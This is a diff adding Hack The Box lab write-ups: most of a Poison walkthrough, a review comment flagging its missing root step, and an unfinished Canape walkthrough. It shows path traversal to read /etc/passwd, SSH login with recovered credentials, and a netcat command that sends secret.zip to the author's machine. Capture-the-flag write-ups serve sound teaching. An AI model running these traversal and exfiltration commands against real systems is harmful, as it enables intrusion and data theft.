+ | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
+ |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
+ |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+ Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.95 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it :
+
+
+
+Looks like a basic php webpage, we are hinted towards listfiles.php so let's check it out :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/listfiles.php
+ Array
+ (
+ [0] => .
+ [1] => ..
+ [2] => browse.php
+ [3] => index.php
+ [4] => info.php
+ [5] => ini.php
+ [6] => listfiles.php
+ [7] => phpinfo.php
+ [8] => pwdbackup.txt
+ )
+
+
+
+Here we see 2 interesting things: browse.php et pwdbackup.txt so let's use browse.php to print out pwdbackup.txt:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/browse.php\?file\=pwdbackup.txt
+ This password is secure, it's encoded atleast 13 times.. what could go wrong really..
+
+ Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
+ bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
+ bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
+ M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
+ WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
+ eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
+ WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
+ MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
+ T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
+ WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
+ WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
+ NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
+ Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
+ WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
+ VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
+ Ukd4RVdub3dPVU5uUFQwSwo=
+
+
+So here we have a password that has been encoded 13 times with base64 so let's decode it fairly easily:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nano passwd
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat passwd
+ Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
+ bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
+ bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
+ M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
+ WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
+ eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
+ WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
+ MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
+ T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
+ WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
+ WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
+ NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
+ Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
+ WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
+ VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
+ Ukd4RVdub3dPVU5uUFQwSwo=
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat passwd |base64 -d|base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
+ Charix!2#4%6&8(0
+
+
+And we have a password to work with ! Charix!2#4%6&8(0
+
+Now let's check if there are any LFI Vulnerabilities with the browse.php file which we suspect there is :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/browse.php\?file\=../../../../../../../etc/passwd
+ # $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
+ #
+ root:*:0:0:Charlie &:/root:/bin/csh
+ toor:*:0:0:Bourne-again Superuser:/root:
+ daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
+ operator:*:2:5:System &:/:/usr/sbin/nologin
+ bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
+ tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
+ kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
+ games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
+ news:*:8:8:News Subsystem:/:/usr/sbin/nologin
+ man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+ sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+ smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+ mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+ bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
+ unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
+ proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+ _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
+ _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
+ uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+ pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
+ auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
+ www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+ _ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
+ hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
+ nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
+ _tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
+ messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
+ avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
+ cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
+ charix:*:1001:1001:charix:/home/charix:/bin/csh
+
+
+
+There is ! We also have the username charix to work with, so let's log onto the box via ssh:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → ssh charix@10.10.10.84
+ The authenticity of host '10.10.10.84 (10.10.10.84)' cant be established.
+ ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
+ Password for charix@Poison:
+ Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
+ FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
+
+ Welcome to FreeBSD!
+
+ Release Notes, Errata: https://www.FreeBSD.org/releases/
+ Security Advisories: https://www.FreeBSD.org/security/
+ FreeBSD Handbook: https://www.FreeBSD.org/handbook/
+ FreeBSD FAQ: https://www.FreeBSD.org/faq/
+ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
+ FreeBSD Forums: https://forums.FreeBSD.org/
+
+ Documents installed with the system are in the /usr/local/share/doc/freebsd/
+ directory, or can be installed later with: pkg install en-freebsd-doc
+ For other languages, replace "en" with a language code like de or fr.
+
+ Show the version of FreeBSD installed: freebsd-version ; uname -a
+ Please include that output and any error messages when posting questions.
+ Introduction to manual pages: man man
+ FreeBSD directory layout: man hier
+
+ Edit /etc/motd to change this login announcement.
+ To see the last 10 lines of a long file, use "tail filename". To see the
+ first 10 lines, use "head filename".
+ -- Dru
+ charix@Poison:~ % cat user.txt
+ eaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to gain root access onto this box wefirst need to take a look around the charix user's home directory.
+
+
+ charix@Poison:~ % ls -lash
+ total 48
+ 4 drwxr-x--- 2 charix charix 512B Mar 19 2018 .
+ 4 drwxr-xr-x 3 root wheel 512B Mar 19 2018 ..
+ 4 -rw-r----- 1 charix charix 1.0K Mar 19 2018 .cshrc
+ 0 -rw-rw---- 1 charix charix 0B Mar 19 2018 .history
+ 4 -rw-r----- 1 charix charix 254B Mar 19 2018 .login
+ 4 -rw-r----- 1 charix charix 163B Mar 19 2018 .login_conf
+ 4 -rw-r----- 1 charix charix 379B Mar 19 2018 .mail_aliases
+ 4 -rw-r----- 1 charix charix 336B Mar 19 2018 .mailrc
+ 4 -rw-r----- 1 charix charix 802B Mar 19 2018 .profile
+ 4 -rw-r----- 1 charix charix 281B Mar 19 2018 .rhosts
+ 4 -rw-r----- 1 charix charix 849B Mar 19 2018 .shrc
+ 4 -rw-r----- 1 root charix 166B Mar 19 2018 secret.zip
+ 4 -rw-r----- 1 root charix 33B Mar 19 2018 user.txt
+
+
+
+Here we see an interesting file secret.zip that we'll try to download locally:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → wget "http://10.10.10.84/browse.php?file=../../../../../../../home/charix/secret.zip"
+ --2020-03-16 14:23:51-- http://10.10.10.84/browse.php?file=../../../../../../../home/charix/secret.zip
+ Connecting to 10.10.10.84:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 423 [text/html]
+ Saving to: ‘browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip’
+
+ browse.php?file=..%2F..%2F..%2 100%[==================================================>] 423 --.-KB/s in 0s
+
+ 2020-03-16 14:23:51 (28.1 MB/s) - ‘browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip’ saved [423/423]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → ls
+ 'browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip' nihilist.sh passwd
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat browse.php\?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip
+
+
+ **Warning** : include(../../../../../../../home/charix/secret.zip): failed to open stream: Permission denied in **/usr/local/www/apache24/data/browse.php** on line **2**
+
+
+
+ **Warning** : include(): Failed opening '../../../../../../../home/charix/secret.zip' for inclusion (include_path='.:/usr/local/www/apache24/data') in **/usr/local/www/apache24/data/browse.php** on line **2**
+
+
+
+
+Although as you can imagine, we (the web user) are not the charix user ! Therefore we cannot access his directory in /home, so instead we'll use netcat which is available for us on the machine to get send it to us locally:
+
+_Terminal 1:_
+
+
+ charix@Poison:~ % cat secret.zip | nc 10.10.14.10 9001
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc -lvnp 9001 > secret.zip
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+ Ncat: Connection from 10.10.10.84.
+ Ncat: Connection from 10.10.10.84:54774.
+ ^C
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → file secret.zip
+ secret.zip: Zip archive data, at least v2.0 to extract
+
+
+
+We unzip it with the password we found earlier ( Charix!2#4%6&8(0 ) :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → file secret.zip
+ secret.zip: Zip archive data, at least v2.0 to extract
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → unzip secret.zip
+ Archive: secret.zip
+ [secret.zip] secret password:
+ extracting: secret
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat secret
+ ��[|Ֆz!
+
+
+secret seems to be an odd file, so we enumerate the box a little further, but from inside our ssh connection :
+
+
+ charix@Poison:~ % netstat -an
+ Active Internet connections (including servers)
+ Proto Recv-Q Send-Q Local Address Foreign Address (state)
+ tcp4 0 44 10.10.10.84.22 10.10.14.10.48110 ESTABLISHED
+ tcp4 0 0 127.0.0.1.25 *.* LISTEN
+ tcp4 0 0 *.80 *.* LISTEN
+ tcp6 0 0 *.80 *.* LISTEN
+ tcp4 0 0 *.22 *.* LISTEN
+ tcp6 0 0 *.22 *.* LISTEN
+ tcp4 0 0 127.0.0.1.5801 *.* LISTEN
+ tcp4 0 0 127.0.0.1.5901 *.* LISTEN
+ udp4 0 0 *.514 *.*
+ udp6 0 0 *.514 *.*
+
+
+It looks like we have 2 ports : 5801 and 5901 listening on the localhost address, These 2 ports may show us that there is a VNC service for us to exploit, so we'll assume that secret is a crackable VPC password using vncpwd which gives us this password:
+
+
+ VNCP@$$!
+
+
+Although these 2 ports are not available for us (remote attacker) we need to re-direct the traffic to us somehow.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc 10.10.10.84 5904
+ Ncat: Connection refused.
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc 10.10.10.84 5901
+ Ncat: Connection refused.
+
+
+
+To do so we'll create a FIFO file inside /tmp to redirect , and forward the vnc connection to the correct port, To connect there, we'll use vncviewer to connect on port 5904 which is the fourth client:
+
+
+
+And that's it ! we have been able to print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
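Review bot: Part 3 of Medium/24.md drops the actual root step: after `nc 10.10.10.84 5901` comes back refused, the text says "we'll create a FIFO file inside /tmp to redirect , and forward the vnc connection to the correct port" and then jumps straight to the root flag, with no forward command, no vncviewer invocation and no root shell output. Since charix already has SSH access and the netstat output shows `127.0.0.1.5901` bound to loopback only, the reader needs to see the tunnel (for example an `ssh -L` local forward from a port on the attacker's box to 127.0.0.1:5901 on Poison) and the vncviewer connection against that local port; the sentence "port 5904 which is the fourth client" also contradicts the netstat listing, which shows only 5801 and 5901, so either say that 5904 is a locally chosen forward port or drop it. Smaller fixes in the same hunk: "VPC password" should read "VNC password", the vncpwd command that turned the `secret` file into `VNCP@$$!` should be shown rather than only its result, "browse.php et pwdbackup.txt" has a stray French "et", and the lone backtick before "_Terminal 2:_" is formatting debris.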
diff --git a/Medium/25.md b/Medium/25.md
new file mode 100644
index 0000000..f017cae
--- /dev/null
+++ b/Medium/25.md
@@ -0,0 +1,584 @@
+# Canape Writeup
+
+
+
+## Introduction :
+
+Canape is a Medium linux box released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -F 10.10.10.70 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:34 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up (0.094s latency).
+ Not shown: 8319 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p80 10.10.10.70
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:35 GMT
+ Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
+ Nmap done: 1 IP address (0 hosts up) scanned in 3.88 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p80 10.10.10.70 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 07:35 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up.
+
+ PORT STATE SERVICE VERSION
+ 80/tcp filtered http
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 2.88 seconds
+
+ λ nihilist [ 10.10.14.5/23 ] [~/_HTB/Canape]
+ → nmap -sCV 10.10.10.70
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 08:42 GMT
+ Nmap scan report for 10.10.10.70
+ Host is up (0.042s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-git:
+ | 10.10.10.70:80/.git/
+ | Git repository found!
+ | Repository description: Unnamed repository; edit this file 'description' to name the...
+ | Last commit message: final # Please enter the commit message for your changes. Li...
+ | Remotes:
+ |_ http://git.canape.htb/simpsons.git
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Simpsons Fan Site
+ |_http-trane-info: Problem with XML parsing of /evox/about
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.21 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up port 80 running http, so let's investigate it :
+
+
+
+Trying to dirsearch the website gives off quite strange results, since every request gives back a 200 status code, so our best bet at finding which really is a successful response is by looking at the size of the response we get most notably those that are not 3KB. Although after fiddling with it a bit, we see that even those that are AND are not 3KB are not even consistent in their responses, it really looks like an unstable webserver.
+
+
+
+Although from this mess, we still see that we are dealing with a CouchDB website. Our nmap scan picked up a github repository in /.git/ aswell as a domain name : canape.htb with it's subdomain git.canape.htb so before we investigate all those, we add the correct line in our /etc/hosts file and use wfuzz to check what's going on with those 200 status codes:
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.70 canape.htb' >> /etc/hosts
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → ping canape.htb
+ PING canape.htb (10.10.10.70) 56(84) bytes of data.
+ 64 bytes from canape.htb (10.10.10.70): icmp_seq=1 ttl=63 time=65.3 ms
+ 64 bytes from canape.htb (10.10.10.70): icmp_seq=2 ttl=63 time=57.0 ms
+ ^C
+
+
+
+Now that we added it to our /etc/hosts file let's wfuzz the webservice:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+
+ ********************************************************
+ * Wfuzz 2.4.5 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.70/FUZZ
+ Total requests: 220560
+
+ ===================================================================
+ ID Response Lines Word Chars Payload
+ ===================================================================
+
+ 000000010: 200 82 L 237 W 3076 Ch "#"
+ 000000007: 200 82 L 237 W 3076 Ch "# license, visit http://creativecommons.org/lic
+ enses/by-sa/3.0/"
+ 000000004: 200 82 L 237 W 3076 Ch "#"
+ 000000005: 200 82 L 237 W 3076 Ch "# This work is licensed under the Creative Comm
+ ons"
+ 000000009: 200 82 L 237 W 3076 Ch "# Suite 300, San Francisco, California, 94105,
+ USA."
+ 000000006: 200 82 L 237 W 3076 Ch "# Attribution-Share Alike 3.0 License. To view
+ a copy of this"
+ 000000003: 200 82 L 237 W 3076 Ch "# Copyright 2007 James Fisher"
+ 000000002: 200 82 L 237 W 3076 Ch "#"
+ 000000008: 200 82 L 237 W 3076 Ch "# or send a letter to Creative Commons, 171 Sec
+ ond Street,"
+ 000000001: 200 82 L 237 W 3076 Ch "# directory-list-2.3-medium.txt"
+ 000000012: 200 82 L 237 W 3076 Ch "# on atleast 2 different hosts"
+ 000000011: 200 82 L 237 W 3076 Ch "# Priority ordered case sensative list, where e
+ ntries were found"
+ 000000013: 200 82 L 237 W 3076 Ch "#"
+ 000000015: 200 0 L 1 W 52 Ch "index"
+ 000000016: 200 82 L 237 W 3076 Ch "images"
+ 000000014: 200 82 L 237 W 3076 Ch ""
+ 000000019: 200 82 L 237 W 3076 Ch "news"
+ 000000020: 200 0 L 1 W 227 Ch "crack"
+ 000000017: 200 82 L 237 W 3076 Ch "download"
+ 000000018: 200 82 L 237 W 3076 Ch "2006"
+ 000000022: 200 0 L 1 W 185 Ch "warez"
+ 000000023: 200 0 L 1 W 210 Ch "full"
+ 000000021: 200 82 L 237 W 3076 Ch "serial"
+ 000000024: 200 82 L 237 W 3076 Ch "12"
+ 000000025: 200 0 L 1 W 138 Ch "contact"
+ 000000027: 200 82 L 237 W 3076 Ch "search"
+ 000000028: 200 0 L 1 W 171 Ch "spacer"
+ 000000029: 200 0 L 1 W 193 Ch "privacy"
+ 000000026: 200 82 L 237 W 3076 Ch "about"
+ 000000030: 200 0 L 1 W 169 Ch "11"
+ 000000031: 200 0 L 1 W 73 Ch "logo"
+ 000000032: 200 82 L 237 W 3076 Ch "blog"
+ 000000033: 200 0 L 1 W 180 Ch "new"
+ 000000034: 200 82 L 237 W 3076 Ch "10"
+ 000000036: 200 82 L 237 W 3076 Ch "faq"
+ 000000037: 200 0 L 1 W 149 Ch "rss"
+ 000000038: 200 0 L 1 W 173 Ch "home"
+ 000000040: 200 0 L 1 W 185 Ch "default"
+ 000000039: 200 82 L 237 W 3076 Ch "img"
+ 000000035: 200 82 L 237 W 3076 Ch "cgi-bin"
+ 000000041: 200 0 L 1 W 197 Ch "2005"
+ 000000043: 200 0 L 1 W 116 Ch "sitemap"
+ 000000042: 200 82 L 237 W 3076 Ch "products"
+ 000000044: 200 82 L 237 W 3076 Ch "archives"
+ 000000045: 200 82 L 237 W 3076 Ch "1"
+ 000000047: 200 0 L 1 W 90 Ch "links"
+ 000000046: 200 82 L 237 W 3076 Ch "09"
+ 000000051: 200 82 L 237 W 3076 Ch "2"
+ 000000049: 200 0 L 1 W 233 Ch "08"
+ 000000050: 200 0 L 1 W 93 Ch "06"
+ 000000048: 200 82 L 237 W 3076 Ch "01"
+ 000000052: 200 0 L 1 W 193 Ch "07"
+ 000000053: 200 82 L 237 W 3076 Ch "login"
+ 000000054: 200 0 L 1 W 184 Ch "articles"
+ 000000055: 200 82 L 237 W 3076 Ch "support"
+ 000000057: 200 82 L 237 W 3076 Ch "keygen"
+ 000000058: 200 0 L 1 W 208 Ch "article"
+ 000000060: 200 82 L 237 W 3076 Ch "03"
+ 000000059: 200 82 L 237 W 3076 Ch "04"
+ 000000056: 200 82 L 237 W 3076 Ch "05"
+ 000000062: 200 0 L 1 W 233 Ch "events"
+ 000000061: 200 82 L 237 W 3076 Ch "help"
+ 000000063: 200 0 L 1 W 110 Ch "archive"
+ 000000064: 200 0 L 1 W 135 Ch "02"
+ 000000065: 200 0 L 1 W 89 Ch "register"
+ 000000067: 200 0 L 1 W 114 Ch "forum"
+ 000000066: 200 0 L 1 W 218 Ch "en"
+ 000000069: 200 82 L 237 W 3076 Ch "downloads"
+ 000000068: 200 82 L 237 W 3076 Ch "software"
+ 000000072: 200 0 L 1 W 161 Ch "13"
+ 000000073: 200 0 L 1 W 63 Ch "category"
+ 000000070: 200 0 L 1 W 123 Ch "3"
+ 000000071: 200 0 L 1 W 124 Ch "security"
+ 000000074: 200 0 L 1 W 99 Ch "4"
+ 000000076: 200 0 L 1 W 149 Ch "14"
+ ^C
+
+
+
+So we'll rule out the 1Word requests using the --hw flag (hide words):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz --hw 1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+
+But we also see that we get 3076 characters, so let's change it accordingly using the --hh flag (hide characters):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wfuzz --hw 1 --hh 3076 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.70/FUZZ
+
+
+While that runs we'll send a quote and intercept it with burp (foxyproxy + intercepter) and then send it to the repeater (CTRL+R) and go there (CTRL+SHIFT+R)
+
+  
+
+Once the request is saved we can start running another enumerating process in the background (here: wfuzz + sqlmap) 
+
+So from here, we'll check the /check directory using burpsuite. Sqlmap returned that quote isn't injectable. Let's send the intercepted /check request to the repeater :
+
+
+
+However after fuzzing around with /check a bit in burpsuite we get 405 errors : methods not allowed.
+
+Instead let's move over to the .git directory our nmap scan found earlier :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → git clone http://git.canape.htb/simpsons.git
+ Cloning into 'simpsons'...
+ fatal: unable to access 'http://git.canape.htb/simpsons.git/': Could not resolve host: git.canape.htb
+
+
+Now doing so gives us an error because we didn't add the correct line at the end of our /etc/hosts file , we need to add BOTH canape.htb and git.canape.htb
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Canape]
+ → nano /etc/hosts
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → git clone http://git.canape.htb/simpsons.git
+ Cloning into 'simpsons'...
+ remote: Counting objects: 49, done.
+ remote: Compressing objects: 100% (47/47), done.
+ remote: Total 49 (delta 18), reused 0 (delta 0)
+ Unpacking objects: 100% (49/49), 163.16 KiB | 262.00 KiB/s, done.
+
+
+
+Once that's done, we git clone the repository and take a look into it for interesting files, beforehand you can cd into simpsons, and type in **git log** to know which commits have been done so let's do it and we see an interesting commit :
+
+
+ commit a389475a903520abba71a5c9b2fa0a15686c8fbb
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Sat Jan 20 07:26:43 2018 -0800
+
+ trollface
+
+ commit f9be9a9a7b217f67923ec22b360de313854b6ab6
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Mon Jan 15 18:48:16 2018 -0800
+
+ add note**commit c8a74a098a60aaea1af98945bd707a7eab0ff4b0**
+ Author: Homer Simpson <****homerj0121@outlook.com>
+ Date: Mon Jan 15 18:46:30 2018 -0800
+
+ temporarily hide check due to vulerability
+ :
+
+let's investigate the last commit (c8a74a098a60aaea1af98945bd707a7eab0ff4b0) which says something about a vulnerability :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [_HTB/Canape/simpsons] at master ✔
+ → git diff c8a74a098a60aaea1af98945bd707a7eab0ff4b0
+
+
+So we run the aforementionned command, and we have a few interesting changes, most notably into /submit's submit python function :
+
+
+
+Instead of sending the quote into cPickle, it goes into a file which is md5 hashed. So we're taking the character and quote user input from the http page whose characters are into the WHITELIST and they must be lowercase. which creates the ID by making a md5sum whose hex is going to be digested.
+
+
+ md5sum(char+quote) is equal to the p_id
+
+
